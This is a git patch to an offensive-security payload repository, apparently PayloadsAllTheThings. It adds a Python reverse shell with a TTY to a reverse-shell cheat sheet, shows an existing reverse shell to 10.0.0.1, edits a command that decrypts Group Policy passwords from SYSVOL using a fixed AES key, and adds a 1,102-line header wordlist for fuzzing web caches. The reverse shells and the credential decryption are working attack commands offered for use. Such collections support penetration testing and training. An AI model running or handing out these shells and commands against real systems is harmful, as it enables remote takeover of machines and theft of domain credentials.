From 35d4139373bab2a15e0371b069235c125c226428 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 8 Oct 2018 13:49:50 +0200 Subject: [PATCH] WebCache param miner file + Reverse shell Python TTY --- .../Active Directory Attack.md | 2 +- .../Network Pivoting Techniques.md | 4 +- .../Reverse Shell Cheatsheet.md | 4 + .../param_miner_lowercase_headers.txt | 1102 +++++++++++++++++ 4 files changed, 1109 insertions(+), 3 deletions(-) create mode 100644 Web cache deception/Intruders/param_miner_lowercase_headers.txt diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 738d062..623d913 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -105,7 +105,7 @@ Find password in SYSVOL findstr /S /I cpassword \\\sysvol\\policies\*.xml ``` -Decrypt a password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)) +Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)) ```bash echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index 6720cbd..5203216 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -32,7 +32,6 @@ Cool Tip : Konami SSH Port forwarding -D 1090 ``` - ### Local Port Forwarding ```bash @@ -132,4 +131,5 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/) -* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) \ No newline at end of file +* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) +* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) \ No newline at end of file diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 207c138..497eb1c 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -36,6 +36,10 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen( Linux only +```python +python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' +``` + ```python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` diff --git a/Web cache deception/Intruders/param_miner_lowercase_headers.txt b/Web cache deception/Intruders/param_miner_lowercase_headers.txt new file mode 100644 index 0000000..8ff7e68 --- /dev/null +++ b/Web cache deception/Intruders/param_miner_lowercase_headers.txt @@ -0,0 +1,1102 @@ +Accept +Accept-Application +Accept-Charset +Accepted +Accept-Encoding +Accept-Encodxng +Accept-Language +Accept-Ranges +Accept-Version +Access-Control-Allow-Credentials +Access-Control-Allow-Headers +Access-Control-Allow-Methods +Access-Control-Allow-Origin +Access-Control-Expose-Headers +Access-Control-Max-Age +Access-Control-Request-Headers +Access-Control-Request-Method +Accesskey +Access-Token +Action +Admin +Age +Ajax +Akamai-Origin-Hop +Allow +App +Appcookie +App-Env +App-Key +Apply-To-Redirect-Ref +Appname +Appversion +Atcept-Language +Auth +Auth-Any +Auth-Basic +Auth-Digest +Auth-Digest-Ie +Authentication +Auth-Gssneg +Auth-Key +Auth-Ntlm +Authorization +Auth-Password +Auth-Realm +Auth-Type +Auth-User +Bad-Gateway +Bad-Request +Bae-Env-Addr-Bcms +Bae-Env-Addr-Bcs +Bae-Env-Addr-Bus +Bae-Env-Addr-Channel +Bae-Env-Addr-Sql-Ip +Bae-Env-Addr-Sql-Port +Bae-Env-Ak +Bae-Env-Appid +Bae-Env-Sk +Bae-Logid +Bar +Base +Base-Url +Basic +Bearer-Indication +Body-Maxlength +Body-Truncated +Brief +Browser-User-Agent +Cache-Control +Cache-Info +Case-Files +Catalog +Catalog-Server +Category +Cert-Cookie +Cert-Flags +Cert-Issuer +Cert-Keysize +Cert-Secretkeysize +Cert-Serialnumber +Cert-Server-Issuer +Cert-Server-Subject +Cert-Subject +Cf-Connecting-Ip +Cf-Ipcountry +Cf-Template-Path +Cf-Visitor +Ch +Challenge-Response +Charset +Chunk-Size +Client +Clientaddress +Client-Address +Client-Bad-Request +Client-Conflict +Client-Error-Cannot-Access-Local-File +Client-Error-Cannot-Connect +Client-Error-Communication-Failure +Client-Error-Connect +Client-Error-Invalid-Parameters +Client-Error-Invalid-Server-Address +Client-Error-No-Error +Client-Error-Protocol-Failure +Client-Error-Unspecified-Error +Client-Expectation-Failed +Client-Forbidden +Client-Gone +Clientip +Client-Ip +Client-Length-Required +Client-Method-Not-Allowed +Client-Not-Acceptable +Client-Not-Found +Client-Payment-Required +Client-Precondition-Failed +Client-Proxy-Auth-Required +Client-Quirk-Mode +Client-Requested-Range-Not-Possible +Client-Request-Timeout +Client-Request-Too-Large +Client-Request-Uri-Too-Large +Client-Unauthorized +Client-Unsupported-Media-Type +Cloudfront-Viewer-Country +Cloudinary-Name +Cloudinary-Public-Id +Cloudinaryurl +Cloudinary-Version +Code +Coming-From +Compress +Conflict +Connection +Connection-Type +Contact +Content +Content-Disposition +Content-Encoding +Content-Language +Content-Length +Content-Location +Content-Md5 +Content-Range +Content-Security-Policy +Content-Security-Policy-Report-Only +Content-Type +Content-Type-Xhtml +Context-Path +Continue +Cookie +Cookie2 +Cookie-Domain +Cookie-Httponly +Cookie-Parse-Raw +Cookie-Path +Cookies +Cookie-Secure +Cookie-Vars +Core-Base +Created +Credentials-Filepath +Curl +Curl-Multithreaded +Custom-Header +Custom-Secret-Header +Dataserviceversion +Date +Debug +Deflate-Level-Def +Deflate-Level-Max +Deflate-Level-Min +Deflate-Strategy-Def +Deflate-Strategy-Filt +Deflate-Strategy-Fixed +Deflate-Strategy-Huff +Deflate-Strategy-Rle +Deflate-Type-Gzip +Deflate-Type-Raw +Deflate-Type-Zlib +Delete +Depth +Destination +Destroy +Devblocksproxybase +Devblocksproxyhost +Devblocksproxyssl +Device-Stock-Ua +Digest +Dir +Dir-Name +Dir-Resource +Disable-Gzip +Dkim-Signature +Dnt +Download-Attachment +Download-Bad-Url +Download-Bz2 +Download-Cut-Short +Download-E-Headers-Sent +Download-E-Invalid-Archive-Type +Download-E-Invalid-Content-Type +Download-E-Invalid-File +Download-E-Invalid-Param +Download-E-Invalid-Request +Download-E-Invalid-Resource +Download-E-No-Ext-Mmagic +Download-E-No-Ext-Zlib +Download-Inline +Download-Mime-Type +Download-No-Server +Download-Size +Download-Status-Not-Found +Download-Status-Server-Error +Download-Status-Unauthorized +Download-Status-Unknown +Download-Tar +Download-Tgz +Download-Url +Download-Zip +E-Encoding +E-Header +E-Invalid-Param +E-Malformed-Headers +E-Message-Type +Enable-Gzip +Enable-No-Cache-Headers +Encoding-Stream-Flush-Full +Encoding-Stream-Flush-None +Encoding-Stream-Flush-Sync +Env-Silla-Environment +Env-Vars +E-Querystring +E-Request +E-Request-Method +E-Request-Pool +E-Response +Error +Error-1 +Error-2 +Error-3 +Error-4 +Error-Formatting-Html +E-Runtime +E-Socket +Espo-Authorization +Espo-Cgi-Auth +Etag +E-Url +Eve-Charid +Eve-Charname +Eve-Solarsystemid +Eve-Solarsystemname +Eve-Trusted +Ex-Copy-Movie +Expect +Expectation-Failed +Expires +Ext +Failed-Dependency +Fake-Header +Fastly-Client-Ip +Fb-Appid +Fb-Secret +Filename +File-Not-Found +Files +Files-Vars +Fire-Breathing-Dragon +Foo +Foo-Bar +Forbidden +Force-Language +Force-Local-Xhprof +Format +Forwarded +Forwarded-For +Forwarded-For-Ip +Forwarded-Proto +From +Fromlink +Front-End-Https +Gateway-Interface +Gateway-Time-Out +Get +Get-Vars +Givenname +Global-All +Global-Cookie +Global-Get +Global-Post +Gone +Google-Code-Project-Hosting-Hook-Hmac +Gzip-Level +H0st +Head +Header +Header-Lf +Header-Status-Client-Error +Header-Status-Informational +Header-Status-Redirect +Header-Status-Server-Error +Header-Status-Successful +Home +Host +Hosti +Host-Liveserver +Host-Name +Host-Unavailable +Htaccess +Http-Accept +Http-Accept-Encoding +Http-Accept-Language +Http-Authorization +Http-Connection +Http-Cookie +Http-Host +Http-Phone-Number +Http-Referer +Https +Https-From-Lb +Https-Keysize +Https-Secretkeysize +Https-Server-Issuer +Https-Server-Subject +Http-Url +Http-User-Agent +If +If-Match +If-Modified-Since +If-Modified-Since-Version +If-None-Match +If-Posted-Before +If-Range +If-Unmodified-Since +If-Unmodified-Since-Version +Image +Images +Incap-Client-Ip +Info +Info-Download-Size +Info-Download-Time +Info-Return-Code +Info-Total-Request-Stat +Info-Total-Response-Stat +Insufficient-Storage +Internal-Server-Error +Ipresolve-Any +Ipresolve-V4 +Ipresolve-V6 +Ischedule-Version +Iv-Groups +Iv-User +Javascript +Jenkins +Keep-Alive +Kiss-Rpc +Label +Large-Allocation +Last-Event-Id +Last-Modified +Length-Required +Link +Local-Addr +Local-Content-Sha1 +Local-Dir +Location +Locked +Lock-Token +Mail +Max-Conn +Maxdataserviceversion +Max-Forwards +Max-Request-Size +Max-Uri-Length +Message +Message-B +Meth- +Meth-Acl +Meth-Baseline-Control +Meth-Checkin +Meth-Checkout +Meth-Connect +Meth-Copy +Meth-Delete +Meth-Get +Meth-Head +Meth-Label +Meth-Lock +Meth-Merge +Meth-Mkactivity +Meth-Mkcol +Meth-Mkworkspace +Meth-Move +Method +Method-Not-Allowed +Meth-Options +Meth-Post +Meth-Propfind +Meth-Proppatch +Meth-Put +Meth-Report +Meth-Trace +Meth-Uncheckout +Meth-Unlock +Meth-Update +Meth-Version-Control +Mimetype +Modauth +Mode +Mod-Env +Mod-Rewrite +Mod-Security-Message +Module-Class +Module-Class-Path +Module-Name +Moved-Permanently +Moved-Temporarily +Ms-Asprotocolversion +Msg-None +Msg-Request +Msg-Response +Msisdn +Multipart-Boundary +Multiple-Choices +Multi-Status +My-Header +Mysqlport +Native-Sockets +Negotiate +Nl +No-Content +Non-Authoritative +Nonce +Not-Acceptable +Not-Exists +Not-Extended +Not-Found +Notification-Template +Not-Implemented +Not-Modified +Oc-Chunked +Ocs-Apirequest +Ok +On-Behalf-Of +Onerror-Continue +Onerror-Die +Onerror-Return +Opencart +Options +Organizer +Origin +Originator +Orig_path_info +Overwrite +Params-Allow-Comma +Params-Allow-Failure +Params-Default +Params-Get-Catid +Params-Get-Currentday +Params-Get-Disposition +Params-Get-Downwards +Params-Get-Givendate +Params-Get-Lang +Params-Get-Type +Params-Raise-Error +Partial-Content +Passkey +Password +Path +Path-Base +Path-Info +Path-Themes +Path-Translated +Payment-Required +Pc-Remote-Addr +Phone-Number +Php +Php-Auth-Pw +Php-Auth-User +Phpthreads +Pink-Pony +Port +Portsensor-Auth +Post +Post-Error +Post-Files +Postredir-301 +Postredir-302 +Postredir-All +Post-Vars +Pragma +Pragma-No-Cache +Precondition-Failed +Prefer +Processing +Profile +Protocol +Protocols +Proxy +Proxy-Agent +Proxy-Authenticate +Proxy-Authentication-Required +Proxy-Authorization +Proxy-Connection +Proxy-Host +Proxy-Http +Proxy-Http-1-0 +Proxy-Password +Proxy-Port +Proxy-Pwd +Proxy-Request-Fulluri +Proxy-Socks4 +Proxy-Socks4a +Proxy-Socks5 +Proxy-Socks5-Hostname +Proxy-Url +Proxy-User +Public-Key-Pins +Public-Key-Pins-Report-Only +Pull +Put +Querystring +Query-String +Querystring-Type-Array +Querystring-Type-Bool +Querystring-Type-Float +Querystring-Type-Int +Querystring-Type-Object +Querystring-Type-String +Range +Range-Not-Satisfiable +Raw-Post-Data +Read-State-Begin +Read-State-Body +Read-State-Headers +Real-Ip +Real-Method +Reason +Reason-Phrase +Recipient +Redirect +Redirected-Accept-Language +Redirect-Found +Redirection-Found +Redirection-Multiple-Choices +Redirection-Not-Modified +Redirection-Permanent +Redirection-See-Other +Redirection-Temporary +Redirection-Unused +Redirection-Use-Proxy +Redirect-Perm +Redirect-Post +Redirect-Problem-Withoutwww +Redirect-Problem-Withwww +Redirect-Proxy +Redirect-Temp +Ref +Referer +Referer +Referrer +Referrer-Policy +Refferer +Refresh +Remix-Hash +Remote-Addr +Remote-Host +Remote-Host-Wp +Remote-User +Remote-Userhttps +Report-To +Request +Request2-Tests-Base-Url +Request2-Tests-Proxy-Host +Request-Entity-Too-Large +Request-Error +Request-Error-File +Request-Error-Gzip-Crc +Request-Error-Gzip-Data +Request-Error-Gzip-Method +Request-Error-Gzip-Read +Request-Error-Proxy +Request-Error-Redirects +Request-Error-Response +Request-Error-Url +Request-Http-Ver-1-0 +Request-Http-Ver-1-1 +Request-Mbstring +Request-Method +Request-Method- +Request-Method-Delete +Request-Method-Get +Request-Method-Head +Request-Method-Options +Request-Method-Post +Request-Method-Put +Request-Method-Trace +Request-Timeout +Request-Time-Out +Requesttoken +Request-Uri +Request-Uri-Too-Large +Request-Vars +Reset-Content +Response +Rest-Key +Rest-Sign +Retry-After +Returned-Error +Rlnclientipaddr +Root +Safe-Ports-List +Safe-Ports-Ssl-List +Schedule-Reply +Scheme +Script-Name +Secretkey +Sec-Websocket-Accept +Sec-Websocket-Extensions +Sec-Websocket-Key +Sec-Websocket-Key1 +Sec-Websocket-Key2 +Sec-Websocket-Origin +Sec-Websocket-Protocol +Sec-Websocket-Version +See-Other +Self +Send-X-Frame-Options +Server +Server-Bad-Gateway +Server-Error +Server-Gateway-Timeout +Server-Internal +Server-Name +Server-Not-Implemented +Server-Port +Server-Port-Secure +Server-Protocol +Server-Service-Unavailable +Server-Software +Server-Unsupported-Version +Server-Vars +Server-Varsabantecart +Service-Unavailable +Session-Id-Tag +Session-Vars +Set-Cookie +Set-Cookie2 +Shib- +Shib-Application-Id +Shib-Identity-Provider +Shib-Logouturl +Shopilex +Slug +Sn +Soapaction +Socket-Connection-Err +Socketlog +Somevar +Sourcemap +Sp-Client +Sp-Host +Ssl +Ssl-Https +Ssl-Offloaded +Sslsessionid +Ssl-Session-Id +Ssl-Version-Any +Start +Status +Status- +Status-403 +Status-403-Admin-Del +Status-404 +Status-Bad-Request +Status-Code +Status-Forbidden +Status-Ok +Status-Platform-403 +Strict-Transport-Security +Str-Match +Success-Accepted +Success-Created +Success-No-Content +Success-Non-Authoritative +Success-Ok +Success-Partial-Content +Success-Reset-Content +Support +Support-Encodings +Support-Events +Support-Magicmime +Support-Requests +Support-Sslrequests +Surrogate-Capability +Switching-Protocols +Te +Temporary-Redirect +Test +Test-Config +Test-Server-Path +Test-Something-Anything +Ticket +Timeout +Time-Out +Timing-Allow-Origin +Title +Tk +Tmp +Token +Trailer +Transfer-Encoding +Translate +Transport-Err +True-Client-Ip +Ua +Ua-Color +Ua-Cpu +Ua-Os +Ua-Pixels +Ua-Resolution +Ua-Voice +Unauthorized +Unencoded-Url +Unit-Test-Mode +Unless-Modified-Since +Unprocessable-Entity +Unsupported-Media-Type +Upgrade +Upgrade-Insecure-Requests +Upgrade-Required +Upload-Default-Chmod +Uri +Url +Url-From-Env +Url-Join-Path +Url-Join-Query +Url-Replace +Url-Sanitize-Path +Url-Strip- +Url-Strip-All +Url-Strip-Auth +Url-Strip-Fragment +Url-Strip-Pass +Url-Strip-Path +Url-Strip-Port +Url-Strip-Query +Url-Strip-User +Use-Gzip +Use-Proxy +User +Useragent +User-Agent +Useragent-Via +User-Agent-Via +User-Email +User-Id +User-Mail +User-Name +User-Photos +Util +Variant-Also-Varies +Vary +Verbose +Verbose-Throttle +Verify-Cert +Version +Version-1-0 +Version-1-1 +Version-Any +Versioncode +Version-None +Version-Not-Supported +Via +Viad +Waf-Stuff-Below +Wap-Connection +Warning +Webodf-Member-Id +Webodf-Session-Id +Webodf-Session-Revision +Web-Server-Api +Work-Directory +Www-Address +Www-Authenticate +X +X- +X-Aastra-Expmod1 +X-Aastra-Expmod2 +X-Aastra-Expmod3 +X-Accel-Mapping +X-Access-Token +X-Advertiser-Id +X-Ajax-Real-Method +X_alto_ajax_key +X-Alto-Ajax-Keyz +X-Amz-Date +X-Amzn-Remapped-Host +X-Amz-Website-Redirect-Location +X-Api-Key +X-Api-Signature +X-Api-Timestamp +X-Apitoken +X-Apple-Client-Application +X-Apple-Store-Front +X-Arr-Log-Id +X-Arr-Ssl +X-Att-Deviceid +X-Authentication +X-Authentication-Key +X-Auth-Key +X-Auth-Mode +Xauthorization +X-Authorization +X-Auth-Password +X-Auth-Service-Provider +X-Auth-Token +X-Auth-User +X-Auth-Userid +X-Auth-Username +X-Avantgo-Screensize +X-Azc-Remote-Addr +X-Bear-Ajax-Request +X-Bluecoat-Via +X-Bolt-Phone-Ua +X-Browser-Height +X-Browser-Width +X-Cascade +X-Cept-Encoding +X-Cf-Url +X-Chrome-Extension +X-Cisco-Bbsm-Clientip +X-Client-Host +X-Client-Id +X-Clientip +X-Client-Ip +X-Client-Key +X-Client-Os +X-Client-Os-Ver +X-Cluster-Client-Ip +X-Codeception-Codecoverage +X-Codeception-Codecoverage-Config +X-Codeception-Codecoverage-Debug +X-Codeception-Codecoverage-Suite +X-Collect-Coverage +X-Coming-From +X-Confirm-Delete +X-Content-Type +X-Content-Type-Options +X-Credentials-Request +X-Csrf-Crumb +X-Csrftoken +X-Csrf-Token +X-Cuid +X-Custom +X-Dagd-Proxy +X-Davical-Testcase +X-Dcmguid +X-Debug-Test +X-Device-User-Agent +X-Dialog +X-Dns-Prefetch-Control +X-Dokuwiki-Do +X-Do-Not-Track +X-Drestcg +X-Dsid +X-Elgg-Apikey +X-Elgg-Hmac +X-Elgg-Hmac-Algo +X-Elgg-Nonce +X-Elgg-Posthash +X-Elgg-Posthash-Algo +X-Elgg-Time +X-Em-Uid +X-Enable-Coverage +X-Environment-Override +X-Expected-Entity-Length +X-Experience-Api-Version +X-Fb-User-Remote-Addr +X-File-Id +X-Filename +X-File-Name +X-File-Resume +X-File-Size +X-File-Type +X-Firelogger +X-Fireloggerauth +X-Firephp-Version +X-Flash-Version +X-Flx-Consumer-Key +X-Flx-Consumer-Secret +X-Flx-Redirect-Url +X-Foo +X-Foo-Bar +X-Forwarded +X-Forwarded-By +X-Forwarded-For +X-Forwarded-For-Original +X-Forwarded-Host +X-Forwarded-Port +X-Forwarded-Proto +X-Forwarded-Protocol +X-Forwarded-Scheme +X-Forwarded-Server +X-Forwarded-Ssl +X-Forwarded-Ssl +X-Forwarder-For +X-Forward-For +X-Forward-Proto +X-From +X-Gb-Shared-Secret +X-Geoip-Country +X-Get-Checksum +X-Helpscout-Event +X-Helpscout-Signature +X-Hgarg- +X-Host +X-Http-Destinationurl +X-Http-Host-Override +X-Http-Method +X-Http-Method-Override +X-Http-Path-Override +X-Https +X-Htx-Agent +X-Huawei-Userid +X-Hub-Signature +X-If-Unmodified-Since +X-Imbo-Test-Config +X-Insight +X-Ip +X-Ip-Trail +X-Iwproxy-Nesting +X-Jphone-Color +X-Jphone-Display +X-Jphone-Geocode +X-Jphone-Msname +X-Jphone-Uid +X-Json +X-Kaltura-Remote-Addr +X-Known-Signature +X-Known-Username +X-Litmus +X-Litmus-Second +X-Locking +X-Machine +X-Mandrill-Signature +X-Method-Override +X-Mobile-Gateway +X-Mobile-Ua +X-Mosso-Dt +X-Moz +X-Msisdn +X-Ms-Policykey +X-Myqee-System-Debug +X-Myqee-System-Hash +X-Myqee-System-Isadmin +X-Myqee-System-Isrest +X-Myqee-System-Pathinfo +X-Myqee-System-Project +X-Myqee-System-Rstr +X-Myqee-System-Time +X-Network-Info +X-Nfsn-Https +X-Ning-Request-Uri +X-Nokia-Bearer +X-Nokia-Connection-Mode +X-Nokia-Gateway-Id +X-Nokia-Ipaddress +X-Nokia-Msisdn +X-Nokia-Wia-Accept-Original +X-Nokia-Wtls +X-Nuget-Apikey +X-Oc-Mtime +Xonnection +X-Opera-Info +X-Operamini-Features +X-Operamini-Phone +X-Operamini-Phone-Ua +X-Options +X-Orange-Id +X-Orchestra-Scheme +X-Orig-Client +X-Original-Host +X-Original-Http-Command +X-Originally-Forwarded-For +X-Originally-Forwarded-Proto +X-Original-Remote-Addr +X-Original-Url +X-Original-User-Agent +X-Originating-Ip +X-Os-Prefs +X-Overlay +X-Pagelet-Fragment +X-Password +Xpdb-Debugger +X-Phabricator-Csrf +X-Phpbb-Using-Plupload +X-Pjax +X-Pjax-Container +X-Prototype-Version +Xproxy +X-Proxy-Url +X-Pswd +X-Purpose +X-Qafoo-Profiler +X-Real-Ip +X-Remote-Addr +X-Remote-Protocol +X-Render-Partial +X-Request +X-Requested-With +X-Request-Id +X-Request-Signature +X-Request-Start +X-Request-Timestamp +X-Response-Format +X-Rest-Cors +X-Rest-Password +X-Rest-Username +X-Rewrite-Url +Xroxy-Connection +X-Sakura-Forwarded-For +X-Scalr-Auth-Key +X-Scalr-Auth-Token +X-Scalr-Env-Id +X-Scanner +X-Scheme +X-Screen-Height +X-Screen-Width +X-Sendfile-Type +X-Serialize +X-Serial-Number +X-Server-Id +X-Server-Name +X-Server-Port +X-Signature +X-Sina-Proxyuser +X-Skyfire-Phone +X-Skyfire-Screen +X-Ssl +X-Subdomain +X-Te +X-Teamsite-Preremap +X-Test-Session-Id +X-Timer +X-Tine20-Jsonkey +X-Tine20-Request-Type +X-Tomboy-Client +X-Tor +X-Twilio-Signature +X-Ua-Device +X-Ucbrowser-Device-Ua +X-Uidh +X-Unique-Id +X-Uniquewcid +X-Up-Calling-Line-Id +X-Update +X-Update-Range +X-Up-Devcap-Iscolor +X-Up-Devcap-Screendepth +X-Up-Devcap-Screenpixels +X-Upload-Maxresolution +X-Upload-Name +X-Upload-Size +X-Upload-Type +X-Up-Subno +X-Url-Scheme +X-User +X-User-Agent +X-Username +X-Varnish +X-Verify-Credentials-Authorization +X-Vodafone-3gpdpcontext +X-Wap-Clientid +X-Wap-Client-Sdu-Size +X-Wap-Gateway +X-Wap-Network-Client-Ip +X-Wap-Network-Client-Msisdn +X-Wap-Profile +X-Wap-Proxy-Cookie +X-Wap-Session-Id +X-Wap-Tod +X-Wap-Tod-Coded +X-Whatever +X-Wikimedia-Debug +X-Wp-Nonce +X-Wp-Pjax-Prefetch +X-Ws-Api-Key +X-Xc-Schema-Version +X-Xhprof-Debug +X-Xhr-Referer +X-Xmlhttprequest +X-Xpid +Xxx-Real-Ip +Xxxxxxxxxxxxxxx +X-Zikula-Ajax-Token +X-Zotero-Version +X-Ztgo-Bearerinfo +Y +Zotero-Api-Version +Zotero-Write-Token